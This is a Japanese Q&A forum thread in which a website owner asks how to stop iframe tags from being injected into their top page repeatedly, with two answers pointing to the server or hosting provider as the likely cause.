• ベストアンサー

ウィルスiframeの対処法

最近私が公開しているサイトにiframeのタグが勝手に入りトップページの上部に異常なスペースが入っています。毎日確認して正常なデータをアップロードするのですが、ほぼ1日おきに異常が発生しています。 どうやら自動的にiframeのタグが入るようなプログラムが仕組まれてしまったようです。毎日データの入替えをしていますが、そのうち不正行為に取られ、サイトが閉鎖に追い込まれてしまうと困るので、どなたか対処法を知っている方がいましたら教えてください。

質問者が選んだベストアンサー

• ベストアンサー
回答No.1

ウィルスでhtmlソースが書き変わるということはまずないはずなのですが。。 それはサーバーが原因ではないでしょうか? 契約が切れると自動的に広告が入ることになっているとか。 今まではばれていなかったけど、とうとう管理者にみつかったとか。。 サーバーをクラッキングしないとhtmlを書き変えることはできないと思います。 ファイルをダウンロードして書き換わっているかどうか確認しましょう。

その他の回答 (1)

• dora7075
回答No.2

意図しないiframeがあるというのは危険ですね。参考URLにあるように脆弱性の原因となるからです。 まずはサイトの管理元にこの件について確認しましょう。広告で利用するつもりで自動的に組み込まれているのかもしれません。

参考URL:
http://www.rbbtoday.com/news/20070628/43062.html